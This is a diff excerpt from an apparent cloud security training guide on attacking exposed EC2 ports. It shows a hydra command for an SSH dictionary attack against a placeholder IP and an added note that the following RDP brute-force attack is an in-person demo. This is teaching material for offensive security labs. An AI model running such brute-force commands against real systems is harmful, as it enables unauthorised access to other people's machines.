appsecco/breaking-and-pwning-apps-and-servers-aws-azure-training/documentation/cloud-compute/attacking-ec2s-via-exposed-ports.md

     hydra -f -v -V -t20 -l ec2-user -P custom-rockyou.txt <TARGET-EC2-IP-ADDRESS> ssh

 ### Attack 3 - Dictionary attack against RDP (Demo)

+**This is a demo.
+This machine is NOT created using the deploy-compute-target.
+We set this up during the in-person training.**

 Just like an exposed SSH service can be attacked for Linux based distributions, misconfigured Windows machines exposing their Remote Desktop Port (TCP 3389) can also be attacked.